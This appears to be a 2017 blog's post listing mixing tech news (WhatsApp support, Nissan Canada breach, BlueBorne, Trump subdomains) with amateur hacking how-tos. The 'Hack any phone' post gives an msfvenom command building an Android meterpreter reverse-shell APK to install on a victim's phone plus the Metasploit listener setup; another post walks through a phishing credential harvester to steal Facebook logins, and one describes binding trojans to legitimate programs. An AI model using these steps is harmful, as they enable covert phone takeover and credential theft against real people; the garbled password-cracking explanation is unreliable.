Posts

Showing posts from 2017

Whatsapp may not work on your phone after Dec 31 St if it features on this list; check

Image
Facebook-owned messaging platform WhatsApp has announced that it will stop lending support for a number of smartphones after December 31, 2017. According to WhatsApp blog post, users will not be able to create new accounts and will also not able to verify existing accounts from these smartphones and on platforms. Ending of support does not mean that the users will not be able to access their accounts. WhatsApp has said that users will continue to get access but will not receive any security updates or new features. WhatsApp had earlier in 2016 has stopped lending support to OS versions like Windows Phone 7, Android 2.1, Android 2.2 and iOS 6. WhatsApp also stopped supporting Nokia Symbian S60 from June 2017. In a number of platforms WhatsApp is withdrawing support, like Blackberry OS, the company has stopped manufacturing or launching new smartphones for the platform. WhatsApp has also said that after withdrawing support effective from December 31, some of the features

Whatsapp enables reply privately feature by mistake 🤓

Image
WhatsApp mistakenly rolled out the ‘Reply Privately’ feature in a beta update that will allow users to privately send a message to a participant in a group without anyone else knowing about it. According to Express.co.uk, the hotly-anticipated feature is under development and could be rolled out with other features as well. The feature appeared and was subsequently dropped from the beta version of the app, watcher of the popular chat app @WABetaInfo said, confirming that the developers wrongly enabled the feature. “In the new WhatsApp beta for Windows Phone 2.17.344 the private reply feature is disabled. Probably WhatsApp has wrongly enabled it in 2.17.342,” WABetaInfo tweeted. WABetaInfo said that the option will only be available in group chats and will be included in the small menu that pops-up when users press and hold on a message. Earlier this month, WABetaInfo leaked the details of the features that WhatsApp was developing for web and desktop, including tap to unblock an

#nissan Hacked: Nissan finance Canada suffers data breach- notifies 1.13 million customers

Image
It's the last month of this year, but possibly not the last data breach report. Nissan warns of a possible data breach of personal information on its customers who financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada. Although the company says it does not know precisely how many customers were affected by the data breach, Nissan is contacting all of its roughly 1.13 million current and previous customers. In a statement released Thursday, Nissan Canada said the company became aware of an " unauthorized access to personal information " of some customers on December 11.  " Nissan Canada Finance recently became aware it was the victim of a data breach that may have involved an unauthorized person(s) gaining access to the personal information of some customers that have financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada, " the company said. It's believed that the unknown hack

Hear are the most commonly used passwords of 2017

Image
When a website forces you to use numbers, symbols, and a certain amount of characters in your password, it can be frustrating, but those strength requirements are there for a reason. Without them, many users will enter a password that’s easy to remember and, by extension, is easy for hackers to guess. There are several ways to keep your online identity secure, but before you do anything else, make sure you’re not using any passwords from the list below. SplashData compiled this data by analyzing millions of accounts—mostly from users in western Europe and North America—that were compromised in the past year, Gizmodo reports. To show how the most popular passwords of 2017 compare to 2016's, they've indicated whether each entry has kept its old slot, gone up or down in the rankings, or is new to the list. The latest round-up includes some predictable entries: “123456” occupies the same number one slot it held last year, followed by “password” at number two. There are also a

Bill Gates tells me how he hacked his school's computer to meet girls

Image
B ill Gates needs no introduction whatsoever. After all, he co-found Microsoft and is currently the richest person in the world. In 2000, he also launched the Bill and Melinda Gates Foundation that has donated more than $34 billion to the projects aimed at social welfare.  Gates used his first computer at a private school in Seattle. There, he wrote his first computer program aged just 13. It was the same Lakeside School where Gates met Paul Allen and became friends over a shared love of computers. Apart from being enthusiastic about computers, they used to hack into computers from time to time. You must have heard the famous story that tells how Gates hacked into his school computer to meet girls. In a recent interview with BBC, Bill Gates sheds more light over this story and tells how he enrolled himself into the classes where he was the only boy. He and fellow Microsoft co-founder Paul Allen hacked and make changes into school’s scheduling software to up Gates’ chances of

Mozilla faces blueback after sleeping Mr robot plugin into Firefox

Image
Yesterday, Firefox users noticed a strange new plug-in popping up in their browsers. A new plug-in called Looking Glass found its way into each instance of the new Firefox Quantum browser. It was disabled by default, but users were still alarmed to see a plugin they hadn’t installed. When they checked to see what Looking Glass did, they found a vague and ominous description — “MY REALITY IS JUST DIFFERENT THAN YOURS” — which did little to quiet suspicions. “I did not remember installing this add-on, [and] I would not knowingly install it,” one user wrote in the support forum. “Any explanations welcome because I can't find any reference online.” As it turned out, Looking Glass was part of  Mr. Robot ’s long-running alternative reality game, a trail of clues left by writers for fans to discover. According to Mozilla’s documentation, the plug-in was designed as a “shared experience to further your immersion into the  Mr Robot  universe,” developed as a collaboration between Mozi

Rename Processor

Image
Rename Processor Start-> Run -> Type regedit -> Locate this path here now: HKEY_LOCAL_MACHINE \ HARDWARE \ DISCRIPTION \ System \ CentralProcessor. Find it in "ProcessorNameString" and double click on it; Now change its name to something like i3 two.

Facebook brings live streaming, video chat feature to its instant games on messenger

Image
Facebook introduces two new features for its instant games on Messenger. The first feature will allow users to easily share their gaming experience with others. Facebook, starting today is rolling out this feature that will enable the Messenger users to be able to live stream and share their gaming experience with other in their friend list via Facebook Live option. The second feature will allow Messenger users to play games with each other while video chatting. It is just a year ago that Facebook had introduced the instant games section on Messenger. On completion of a year, Facebook plans to bring the gaming experience on Messenger to a complete different level altogether. "We're introducing two new features to Instant Games that will help you engage and connect with those you care about in new and different ways," notes Facebook on its blog post. Starting today, Facebook is rolling out the live streaming feature on Messenger for the gamers out there so that they

Facebook to roll out click to WhatsApp Messenger button

Image
It seems that Facebook is bringing a new ad unit that will let businesses connect with over one billion WhatsApp users. According to Techcrunch, Facebook has launched a new click-to-WhatsApp messaging button for pushing out ads from the biggest social media platform to WhatsApp so that people can call or message via Whatsapp with the click of a button. The report suggests that this new feature is quite similar to the click-to-Messenger ads that was previously rolled out by Facebook. However, apart from advertisers, it is not clear that whether Facebook plans to add Click-to-Whatsapp service to regular consumers. According to the same report, over a million Facebook pages already had included WhatsApp numbers in their posts and that many businesses are relying on both the social media platforms more informally to connect with customers directly. "Many people already use WhatsApp to communicate with small businesses. It's a fast, convenient way to stay in touch,"

How to hack password?

Image
How can we hack the password of any social media or computer? => To hack any website, we can hack that website's password and user name by tinkering with the URL of the same website. But how to do any offline thing and social media (e.x = facebook, twitter)? (1) Social media Two things are needed to hack social media. (1) user name (2) password The user name is easily found within the social media. (2) password. To hack the password, we first need to know this. That is how many words or numbers this password is. Suppose there is a password of 4 word. So whatever the word and number of keyboard you have to hack it. He will have to connect with each other in 4 words. If we only add numbers to 4-4 words then 9,999 passwords will be created. This work is very hard if a password is of 16 words. So it can take years to hack. For that we ask a social media (# _ $ 15Rv) to keep such a password. But those bigger hackers (e.x ransomware, petya) they work for a long ti

Password stealing apps with over a million downloads found on Google Play Store 🏪

Image
Even after so many efforts by Google like launching bug bounty program and preventing apps from using Android accessibility services, malicious applications somehow manage to get into Play Store and infect people with malicious software. The same happened once again when security researchers discovered at least 85 applications in Google Play Store that were designed to steal credentials from users of Russian-based social network VK.com and were successfully downloaded millions of times. The most popular of all masqueraded as a gaming app with more than a million downloads. When this app was initially submitted in March 2017, it was just a gaming app without any malicious code, according to a blog post published Tuesday by Kaspersky Lab. However, after waiting for more than seven months, the malicious actors behind the app updated it with information-stealing capabilities in October 2017. Besides this gaming app, the Kaspersky researchers found 84 such apps on Google Play Store—most

Bluetooth hack affects 20 million amazon echo and Google Home devices

Image
#&# computer experts  Remember BlueBorne? A series of recently disclosed critical Bluetooth flaws that affect billions of Android, iOS, Windows and Linux devices have now been discovered in millions of AI-based voice-activated personal assistants, including  Google Home  and  Amazon Echo . As estimated during the discovery of this devastating threat, several IoT and smart devices whose operating systems are often updated less frequently than smartphones and desktops are also vulnerable to BlueBorne. BlueBorne is the name given to the sophisticated attack exploiting a total of eight Bluetooth implementation vulnerabilities that allow attackers within the range of the targeted devices to run malicious code, steal sensitive information, take complete control, and launch man-in-the-middle attacks.  What's worse?  Triggering the BlueBorne exploit doesn't require victims to click any link or open any file—all without requiring user interaction. Also, most security produ

Facebook, Update your status with different styles

Update your status with different styles  You can give the next style to the font in Facebook status, comments and chat. For this, visit the website below - http://app.live-start.com/magic-status/ http://namefunk.com/ Type the text in the dialog box and select its style. Now copy and paste it into Facebook and you will see it in different style.

send whatsapp messages can be deleted, but they don't really go away

Image
Encrypted messaging platform WhatsApp recently added the ability to delete sent messages, but the team at Android Jefe (article is in Spanish) has discovered that they don't quite disappear completely. A deleted text still exists on the recipient's device in the form of a notification, Android Jefe found, and with the proper software it can be read hours later. As an individual bug it might not sound too concerning, but the Android notification log doesn't exist in a vacuum. If an Android device has already been compromised by malware, the notification log could be a way for anyone to read WhatsApp messages, deleted or not, and that's a huge security problem for an app that prides itself on being private and secure. Android notifications and you Every time a notification comes to an Android device it gets stored in a log that records everything from that Android session (it clears on reboot). If you can access the notification log you can see a list of every

Hack any phone (STEPS by STEPS)

Image
STEPS: 1. Fire up and open command terminal. 2. Set payload and create custom windows executable Command: root @ kali: - # msfvenom -p android / meterpreter / reverse_tcp LHOST = 192.168.0.110 LPORT = 4444 R> andro.apk (To know your LHOST, open new terminal and type ifconfig) your The apk file is saved in the home folder Note: Do not add any stray space characters anywhere as the command as is (after changing the LHOST and LPORT as needed). 3. Transfer / mail this file (here andro.apk) file to the victim's phone and install it. 4. Start the metasploit framework console as follows: Command:            root @ kali: - # msfconsole 5. Now it's time to open and setup multi-handler Follows the steps: msf>  use multi / handler msf exploit (handler)>  set payload android / meterpreter / reverse_tcp msf exploit (handler)>  set LHOST 192.168.0.110 msf exploit (handler)>  set LPORT 4444 msf exploit (handler)>  exploit          Payload han

Facebook hacking practical video

Facebook hacking practical video  Best tips to hack a facebook account on your smartphone see the video  Like to my facebook page 🗣 Facebook page My applications to learn hacking 🗣 App download

An intoroduction to trojan

Image
Most of you heard about the Trojans in History. Or I am pretty sure that you all have watched the movie "Troy" where Brad pitt is acting as "Achilles". Like in the movie, a trojan is something that looks like a safe bet, but once entered, they will be attached to the host system and starts to pull the plugs of your computer without your knowledge. The behaviour of trojans will be normally daemon. No one will knew it is there, but you will lose your valuable data without your knowledge. There are a variety of ways a trojan horse can look like.   1) It can be some malicious instructions that are hided inside legitimate programs and can perform actions that are unknown and are unwanted by the user. 2) A legit programs source has been altered by binding a Trojan to it. We can read the legits program as byte and then can append the trojans bytes after it. So with the help of a stub, one can easily execute this file. Once executed, the user will see the legit pro

How to hack a facebook??

WHAT IS CREDENTIALS HARVESTER ATTACK ? It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker. STEPS: 1. Boot up kali linux on your machine and open terminal.   2. Type this command in the kali linux terminal.                                          root@kali~#  setoolkit   3. Enter 'y' to agree the social engineering toolkit terms and conditions.   4. Select the following options one by one from the menu                   '1' (Social Engineering Attacks) then                   '2'(Website Attack Vectors) then                 '3'(Credential Harvester Attack)

What is hacking?

Image
In computer networking, hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. The term "hacking" historically referred to constructive, clever technical work that was not necessarily related to computer systems. Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and other networks. Origins of Hacking M.I.T. engineers in the 1950s and 1960s first popularized the term and concept of hacking. Starting at the model train club and later in the mainframe computer rooms, the so-called "hacks" perpetrated by these hackers were intended to be harmless technical experiments and fun learning activities. Later, outside of M.I.T., others began applying the term to less honorable pursuits. Before the Internet became popular, for example, several hackers in the U.S. experimented with methods to modify tele

Trump organization hacked 4 year ago-and the company never noticed

Image
Four years ago, the Trump Organization experienced a major cyber breach that could have allowed the perpetrator (or perpetrators) to mount malware attacks from the company’s web domains and may have enabled the intruders to gain access to the company’s computer network. Up until this week, this penetration had gone undetected by President Donald Trump’s company, according to several internet security researchers. In 2013, a hacker (or hackers) apparently obtained access to the Trump Organization’s domain registration account and created at least 250 website subdomains that cybersecurity experts refer to as “shadow” subdomains. Each one of these shadow Trump subdomains pointed to a Russian IP address, meaning that they were hosted at these Russian addresses.(Every website domain is associated with one or more IP addresses. These addresses allow the internet to find the server that hosts the website. Authentic Trump Organization domains point to IP addresses that are hosted in the

How to make a app??????

Image
Do you want to earn money by making a good app? I have a website for this. On which you can make a good app by working for a month or two. But you will have to learn one or two weeks in this application. This is the name of the website. Thunkable.com